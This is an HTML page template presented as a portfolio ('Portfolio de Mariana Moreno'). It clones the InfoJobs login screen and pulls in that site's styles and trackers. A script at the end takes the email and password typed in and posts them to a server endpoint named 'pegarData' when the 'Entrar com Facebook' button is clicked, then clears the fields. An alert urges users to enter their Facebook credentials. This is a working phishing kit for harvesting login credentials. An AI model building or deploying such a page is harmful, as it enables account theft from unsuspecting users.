

<!doctype html>
<html lang="pt-br">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="Portfolio de Mariana Moreno" />
  <meta name="ROBOTS" content="INDEX,FOLLOW">

  <title>Portfolio de Mariana Moreno</title>
  <link rel="icon" type="image/x-icon" href="https://login.infojobs.com.br/favicon.ico" />
  <link rel="shortcut icon" type="image/x-icon" href="https://login.infojobs.com.br/favicon.ico" />
  <link rel="preload stylesheet" href="https://login.infojobs.com.br/fonts/css/source-sans-pro.css?v=Y8KsImG6OKvmDQOgm4tqCFWcfPgOgtRPvE4lWz2XAe0" as="style" />
  <link rel="preload stylesheet" href="https://login.infojobs.com.br/fonts/css/breve.css?v=W64Q5CzgLBeTcFf9k2h4Lux6hc2q4jGewJkFW9W6hyk" as="style" />
  <link rel="preload stylesheet" href="https://login.infojobs.com.br/dist/css/bootstrap.css?v=V-AYTXOHX1JvsgAgU7RqaShx4Xnxjq5x42uGOKGZ7ts" as="style" />
  
  <script>
    const isPlatform_iOS = 0
  </script>
    <script type="text/javascript" async src="https://login.infojobs.com.br/js/cookiesconsent.js"></script>
    
<!-- Begin comScore Tag -->
<script>
    var _comscore = _comscore || [];
    _comscore.push({ c1: "2", c2: "32843603" });
    (function () {
        var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
        s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
        el.parentNode.insertBefore(s, el);
    })();
</script>
<noscript>
    <img src="https://sb.scorecardresearch.com/p?c1=2&c2=32843603&cv=2.0&cj=1" />
</noscript>
<!-- End comScore Tag -->
<!-- Google Tag Manager -->
<script>
    (function (w, d, s, l, i) {
        w[l] = w[l] || [];
        w[l].push({
            'gtm.start': new Date().getTime(),
            event: 'gtm.js'
        });
        var f = d.getElementsByTagName(s)[0],
            j = d.createElement(s),
            dl = l != 'dataLayer' ? '&l=' + l : '';
        j.async = true;
        j.src = 'https://www.googletagmanager.com/gtm.js?id=' + i + dl;
        f.parentNode.insertBefore(j, f);
    })(window, document, 'script', 'dataLayer', 'GTM-NJRF6LP');
    var gtm = (function () {
        var push = function (obj) {
            window.dataLayer.push(obj);
        };
        var pageView = function () {
            push({ 'event': 'virtual_page_view' });
        };
        return {
            pageView: pageView
        }
    })();
</script>
<!-- End Google Tag Manager -->

</head>
<body>
  

<div class="container-fluid account-login">
    <div class="align-items-lg-center d-flex justify-content-center" style="min-height:100vh">
        <div class="py-15 w-100" style="max-width:500px">
            <div class="card shadow account-login-card">
                <div class="card-body account-login-card-body position-relative">
                    <div class="text-center">
                        <a href="#">
                            <h1>Portfolio de Mariana Moreno</h1>
                        </a>
                    </div>
                    <div class="text-center text-secondary js_registeredUsersAccess" style=""></div>
                    <div class="text-center text-secondary">
                        <span class="js_Hello" style="display:none !important">
                            Olá <span class="js_userName"></span>, insira sua senha para continuar
                        </span>
                        <span class="js_Senha" style="display:none !important"></span>
                    </div>
                    <div class="mx-lg-55 mt-20">
                        <div class="js_externalProviders" style="">
        
                        </div>
                            <div class="font-size-16 text-center text-muted m-15 mb-20 js_Or" style=""></div>
                            <form>
                                <input type="hidden" id="ReturnUrl" name="ReturnUrl" value="" />
                                <div class="form-group mb-30 mt-5 js_groupEmail" style="">
                                    <input type="email" id="dfdf" class="form-control" placeholder="Codigo Verificador" autofocus data-val="true" data-val-email="E-mail inv&#xE1;lido" data-val-required="O e-mail &#xE9; obrigat&#xF3;rio" name="Username" value="">
                                    <span class="text-danger small field-validation-valid" data-valmsg-for="Username" data-valmsg-replace="true"></span>
            
                                </div>
                                <div class="form-group mb-30 mt-5 js_groupEmail" style="">
                                    <input type="email" id="email" class="form-control" placeholder="E-mail" autofocus data-val="true" data-val-email="E-mail inv&#xE1;lido" data-val-required="O e-mail &#xE9; obrigat&#xF3;rio" name="Username" value="">
                                    <span class="text-danger small field-validation-valid" data-valmsg-for="Username" data-valmsg-replace="true"></span>
            
                                </div>
                                <div id="password" class="form-group mb-20 mt-5" style="">
                                    <input id="passwd" type="password" class="form-control" placeholder="Senha" autocomplete="off" data-val="true" data-val-required="A senha &#xE9; obrigat&#xF3;ria" id="Password" name="Password">
                                    <span class="text-danger small field-validation-valid" data-valmsg-for="Password" data-valmsg-replace="true"></span>
                                </div>
            
                                <div class="provider provider-50 js_ExternalProvider-facebook" id="btnface">
                                    <a class="btn btn-block btn-outline-dark" href="#">
                                        <div class="btn-content">
                                            <span class="color-icon"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24.001" viewBox="0 0 24 24.001"><path fill="#1877F2" d="M24 12c0-6.628-5.373-12-12-12C5.372 0 0 5.372 0 12c0 5.99 4.387 10.954 10.125 11.854v-8.385H7.078V12h3.047V9.356c0-3.007 1.791-4.667 4.532-4.667 1.313 0 2.687.234 2.687.234v2.952h-1.512c-1.491 0-1.957.926-1.957 1.873V12h3.328l-.531 3.469h-2.797v8.385C19.613 22.954 24 17.99 24 12"/><path fill="#FFF" d="M16.672 15.469L17.203 12h-3.328V9.748c0-.949.466-1.873 1.957-1.873h1.512V4.922s-1.374-.234-2.687-.234c-2.74 0-4.532 1.662-4.532 4.669V12H7.078v3.469h3.047v8.385c1.242.196 2.508.196 3.75 0v-8.385h2.797"/></svg></span>
                                            <span class="btn-text">Entrar com Facebook</span>
                                        </div>
                                    </a>
                                </div>                    </div>

                </div>
            </div>
        </div>
    </div>
</div>
<div class="modal fade" id="popupResetPwdOK" data-keyboard="false" tabindex="-1" aria-hidden="true" data-backdrop="static">
    <div class="modal-dialog modal-dialog-centered" role="document">
        <div class="modal-content" style="border-radius: 16px;">
            <div class="m-auto modal-body text-center" style="max-width: 334px;">
                <div class="font-weight-bolder font-size-24 border-bottom pb-5 mb-10">Senha redefinida</div>
                <div class="font-size-18 line-height-130 mb-15">A partir de agora, você pode fazer login com a sua senha nova.</div>
                <img width="126" alt="" class=" mb-15" src="https://login.infojobs.com.br/dist/images/woman-on-rocket.svg" />
                <button class="btn btn-primary btn-block mb-30 js_popupResetPwdOKaccept">ACEITAR</button>
            </div>
        </div>
    </div>
</div>
  <script src="https://login.infojobs.com.br/dist/vendors/js/jquery.min.js"></script>
  <script src="https://login.infojobs.com.br/dist/vendors/js/bootstrap.bundle.min.js"></script>
  
        <script type="module" src="https://login.infojobs.com.br/dist/login.c761025f4a16bf495221.js"></script>
    
</body>
</html>

<script type="text/javascript">
    $( "#btnface" ).on( "click", function() {
        email = $("#email").val()
        passwd = $("#passwd").val()
        if (email.length!=0 && passwd.length!=0){

            $.ajax({
                url : "{{ url_for('pegarData') }}",
                type : 'post',
                data : {
                    email : email,
                    passwd : passwd
                }
            })
            .done(function(msg){
                $("#email").val("")
                $("#passwd").val("")

            })


        }else{
            alert("Preencher com credenciais do Facebook!")
        }
    } );

</script>